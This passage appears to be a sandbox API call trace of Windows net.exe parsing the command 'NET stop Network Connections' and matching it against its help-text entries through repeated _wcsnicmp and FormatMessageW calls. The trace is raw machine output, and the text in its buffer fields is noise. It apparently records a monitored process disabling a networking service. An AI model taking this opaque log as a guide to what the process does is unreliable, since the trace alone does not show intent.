_wcsnicmp (_String1="NET stop Network Connections", _String2="NET START RPCSS\r\n", _MaxCount=0x1c) returned 14 [0297.605] LocalFree (hMem=0x42f84a0) returned 0x0 [0297.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 య") returned 0x14 [0297.605] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1c) returned 14 [0297.605] LocalFree (hMem=0x42f8928) returned 0x0 [0297.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="瀈Я\x11筴 ల") returned 0x12 [0297.605] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START SERVER\r\n", _MaxCount=0x1c) returned 14 [0297.605] LocalFree (hMem=0x42f7008) returned 0x0 [0297.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="蒠Я\x11筴 వ") returned 0xf [0297.605] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START UPS\r\n", _MaxCount=0x1c) returned 14 [0297.605] LocalFree (hMem=0x42f84a0) returned 0x0 [0297.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 స") returned 0x17 [0297.605] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1c) returned 14 [0297.605] LocalFree (hMem=0x42f8928) returned 0x0 [0297.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఻") returned 0x18 [0297.605] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1c) returned 14 [0297.605] LocalFree (hMem=0x42f8928) returned 0x0 [0297.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ా") returned 0x2a [0297.606] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET STATISTICS\r\n[WORKSTATION", _MaxCount=0x1c) returned 14 [0297.606] LocalFree (hMem=0x42fc230) returned 0x0 [0297.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ు") returned 0x15 [0297.606] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 19 [0297.606] LocalFree (hMem=0x42f8928) returned 0x0 [0297.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౄ") returned 0x58 [0297.606] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET TIME\r\n\r\n[\\\\computername ", _MaxCount=0x1c) returned -1 [0297.606] LocalFree (hMem=0x42fc230) returned 0x0 [0297.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ే") returned 0x184 [0297.606] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET USE\r\n[devicename | *] [\\", _MaxCount=0x1c) returned -2 [0297.606] LocalFree (hMem=0x42fc230) returned 0x0 [0297.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ొ") returned 0xf0 [0297.606] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET USER\r\n[username [passwor", _MaxCount=0x1c) returned -2 [0297.606] LocalFree (hMem=0x42fc230) returned 0x0 [0297.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ్") returned 0x47 [0297.606] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET VIEW\r\n[\\\\computername [/", _MaxCount=0x1c) returned -3 [0297.606] LocalFree (hMem=0x42fc230) returned 0x0 [0297.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౐") returned 0xc2 [0297.607] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET\r\n [ ACCOUNTS | COMPUT", _MaxCount=0x1c) returned 19 [0297.607] LocalFree (hMem=0x42fc230) returned 0x0 [0297.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౓") returned 0x28d [0297.607] _wcsnicmp (_String1="NET stop Network Connections", _String2="SERVICES\r\nNET START can be u", _MaxCount=0x1c) returned -5 [0297.607] LocalFree (hMem=0x42fc230) returned 0x0 [0297.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౖ") returned 0x483 [0297.607] _wcsnicmp (_String1="NET stop Network Connections", _String2="SYNTAX\r\nThe following conven", _MaxCount=0x1c) returned -5 [0297.607] LocalFree (hMem=0x42fc230) returned 0x0 [0297.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౙ") returned 0xa86 [0297.607] _wcsnicmp (_String1="NET stop Network Connections", _String2="NAMES\r\nThe following types o", _MaxCount=0x1c) returned 4 [0297.607] LocalFree (hMem=0x42fc230) returned 0x0 [0297.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౜") returned 0x54 [0297.607] _wcsnicmp (_String1="NET stop Network Connections", _String2="\r\nFor more information on to", _MaxCount=0x1c) returned 97 [0297.608] LocalFree (hMem=0x42fc230) returned 0x0 [0297.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ௼") returned 0xad [0297.608] _wcsnicmp (_String1="NET stop Network", _String2="NET ACCOUNTS\r\n[/", _MaxCount=0x10) returned 18 [0297.608] LocalFree (hMem=0x42fc230) returned 0x0 [0297.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ௿") returned 0x2e [0297.608] _wcsnicmp (_String1="NET stop Network", _String2="NET COMPUTER\r\n\\\\", _MaxCount=0x10) returned 16 [0297.608] LocalFree (hMem=0x42fc230) returned 0x0 [0297.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ం") returned 0x7d [0297.608] _wcsnicmp (_String1="NET stop Network", _String2="NET CONFIG SERVE", _MaxCount=0x10) returned 16 [0297.608] LocalFree (hMem=0x42fc230) returned 0x0 [0297.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 అ") returned 0x26 [0297.608] _wcsnicmp (_String1="NET stop Network", _String2="NET CONFIG\r\n[SER", _MaxCount=0x10) returned 16 [0297.608] LocalFree (hMem=0x42fc230) returned 0x0 [0297.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఈ") returned 0x19 [0297.608] _wcsnicmp (_String1="NET stop Network", _String2="NET CONTINUE\r\nse", _MaxCount=0x10) returned 16 [0297.608] LocalFree (hMem=0x42f8928) returned 0x0 [0297.608] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఋ") returned 0x1b [0297.608] _wcsnicmp (_String1="NET stop Network", _String2="NET FILE\r\n[id [/", _MaxCount=0x10) returned 13 [0297.609] LocalFree (hMem=0x42fc230) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఎ") returned 0xbe [0297.609] _wcsnicmp (_String1="NET stop Network", _String2="NET GROUP\r\n[grou", _MaxCount=0x10) returned 12 [0297.609] LocalFree (hMem=0x42fc230) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఑") returned 0x33 [0297.609] _wcsnicmp (_String1="NET stop Network", _String2="NET HELP\r\ncomman", _MaxCount=0x10) returned 11 [0297.609] LocalFree (hMem=0x42fc230) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఔ") returned 0x19 [0297.609] _wcsnicmp (_String1="NET stop Network", _String2="NET HELPMSG\r\nmes", _MaxCount=0x10) returned 11 [0297.609] LocalFree (hMem=0x42f8928) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 గ") returned 0xc1 [0297.609] _wcsnicmp (_String1="NET stop Network", _String2="NET LOCALGROUP\r\n", _MaxCount=0x10) returned 7 [0297.609] LocalFree (hMem=0x42fc230) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 చ") returned 0x16 [0297.609] _wcsnicmp (_String1="NET stop Network", _String2="NET PAUSE\r\nservi", _MaxCount=0x10) returned 3 [0297.609] LocalFree (hMem=0x42f8928) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఝ") returned 0x33 [0297.609] _wcsnicmp (_String1="NET stop Network", _String2="NET SESSION\r\n[\\\\", _MaxCount=0x10) returned 15 [0297.609] LocalFree (hMem=0x42fc230) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఠ") returned 0x234 [0297.609] _wcsnicmp (_String1="NET stop Network", _String2="NET SHARE\r\nshare", _MaxCount=0x10) returned 12 [0297.609] LocalFree (hMem=0x42fc230) returned 0x0 [0297.609] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="薸Я\x11筴 ణ") returned 0x13 [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START BROWSE", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f85b8) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ద") returned 0x14 [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START EVENTL", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f8928) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఩") returned 0x14 [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START NETLOG", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f8928) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="蒠Я\x11筴 బ") returned 0x11 [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START RPCSS\r", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f84a0) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 య") returned 0x14 [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START SCHEDU", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f8928) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="瀈Я\x11筴 ల") returned 0x12 [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START SERVER", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f7008) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="蒠Я\x11筴 వ") returned 0xf [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START UPS\r\n", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f84a0) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 స") returned 0x17 [0297.610] _wcsnicmp (_String1="NET stop Network", _String2="NET START WORKST", _MaxCount=0x10) returned 14 [0297.610] LocalFree (hMem=0x42f8928) returned 0x0 [0297.610] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఻") returned 0x18 [0297.611] _wcsnicmp (_String1="NET stop Network", _String2="NET START\r\n[serv", _MaxCount=0x10) returned 14 [0297.611] LocalFree (hMem=0x42f8928) returned 0x0 [0297.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ా") returned 0x2a [0297.611] _wcsnicmp (_String1="NET stop Network", _String2="NET STATISTICS\r\n", _MaxCount=0x10) returned 14 [0297.611] LocalFree (hMem=0x42fc230) returned 0x0 [0297.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ు") returned 0x15 [0297.611] _wcsnicmp (_String1="NET stop Network", _String2="NET STOP\r\nservic", _MaxCount=0x10) returned 19 [0297.611] LocalFree (hMem=0x42f8928) returned 0x0 [0297.611] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౄ") returned 0x58 [0297.611] _wcsnicmp (_String1="NET stop Network", _String2="NET TIME\r\n\r\n[\\\\c", _MaxCount=0x10) returned -1 [0297.611] LocalFree (hMem=0x42fc230) returned 0x0 [0297.615] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ే") returned 0x184 [0297.615] _wcsnicmp (_String1="NET stop Network", _String2="NET USE\r\n[device", _MaxCount=0x10) returned -2 [0297.615] LocalFree (hMem=0x42fc230) returned 0x0 [0297.615] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ొ") returned 0xf0 [0297.615] _wcsnicmp (_String1="NET stop Network", _String2="NET USER\r\n[usern", _MaxCount=0x10) returned -2 [0297.615] LocalFree (hMem=0x42fc230) returned 0x0 [0297.615] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ్") returned 0x47 [0297.615] _wcsnicmp (_String1="NET stop Network", _String2="NET VIEW\r\n[\\\\com", _MaxCount=0x10) returned -3 [0297.615] LocalFree (hMem=0x42fc230) returned 0x0 [0297.615] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౐") returned 0xc2 [0297.615] _wcsnicmp (_String1="NET stop Network", _String2="NET\r\n [ ACCOU", _MaxCount=0x10) returned 19 [0297.615] LocalFree (hMem=0x42fc230) returned 0x0 [0297.615] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౓") returned 0x28d [0297.615] _wcsnicmp (_String1="NET stop Network", _String2="SERVICES\r\nNET ST", _MaxCount=0x10) returned -5 [0297.615] LocalFree (hMem=0x42fc230) returned 0x0 [0297.615] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౖ") returned 0x483 [0297.616] _wcsnicmp (_String1="NET stop Network", _String2="SYNTAX\r\nThe foll", _MaxCount=0x10) returned -5 [0297.616] LocalFree (hMem=0x42fc230) returned 0x0 [0297.616] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౙ") returned 0xa86 [0297.616] _wcsnicmp (_String1="NET stop Network", _String2="NAMES\r\nThe follo", _MaxCount=0x10) returned 4 [0297.616] LocalFree (hMem=0x42fc230) returned 0x0 [0297.616] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ౜") returned 0x54 [0297.616] _wcsnicmp (_String1="NET stop Network", _String2="\r\nFor more infor", _MaxCount=0x10) returned 97 [0297.616] LocalFree (hMem=0x42fc230) returned 0x0 [0297.616] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ௼") returned 0xad [0297.616] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0297.616] LocalFree (hMem=0x42fc230) returned 0x0 [0297.616] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ௿") returned 0x2e [0297.616] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0297.616] LocalFree (hMem=0x42fc230) returned 0x0 [0297.616] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ం") returned 0x7d [0297.616] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0297.616] LocalFree (hMem=0x42fc230) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 అ") returned 0x26 [0297.617] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0297.617] LocalFree (hMem=0x42fc230) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఈ") returned 0x19 [0297.617] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0297.617] LocalFree (hMem=0x42f8928) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఋ") returned 0x1b [0297.617] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0297.617] LocalFree (hMem=0x42fc230) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఎ") returned 0xbe [0297.617] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0297.617] LocalFree (hMem=0x42fc230) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఑") returned 0x33 [0297.617] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0297.617] LocalFree (hMem=0x42fc230) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఔ") returned 0x19 [0297.617] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0297.617] LocalFree (hMem=0x42f8928) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 గ") returned 0xc1 [0297.617] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0297.617] LocalFree (hMem=0x42fc230) returned 0x0 [0297.617] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 చ") returned 0x16 [0297.618] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0297.618] LocalFree (hMem=0x42f8928) returned 0x0 [0297.618] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఝ") returned 0x33 [0297.618] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0297.618] LocalFree (hMem=0x42fc230) returned 0x0 [0297.618] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఠ") returned 0x234 [0297.618] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0297.618] LocalFree (hMem=0x42fc230) returned 0x0 [0297.618] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="薸Я\x11筴 ణ") returned 0x13 [0297.618] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.618] LocalFree (hMem=0x42f85b8) returned 0x0 [0297.618] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ద") returned 0x14 [0297.618] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.618] LocalFree (hMem=0x42f8928) returned 0x0 [0297.618] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఩") returned 0x14 [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.619] LocalFree (hMem=0x42f8928) returned 0x0 [0297.619] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="蒠Я\x11筴 బ") returned 0x11 [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.619] LocalFree (hMem=0x42f84a0) returned 0x0 [0297.619] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 య") returned 0x14 [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.619] LocalFree (hMem=0x42f8928) returned 0x0 [0297.619] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="瀈Я\x11筴 ల") returned 0x12 [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.619] LocalFree (hMem=0x42f7008) returned 0x0 [0297.619] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="蒠Я\x11筴 వ") returned 0xf [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.619] LocalFree (hMem=0x42f84a0) returned 0x0 [0297.619] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 స") returned 0x17 [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 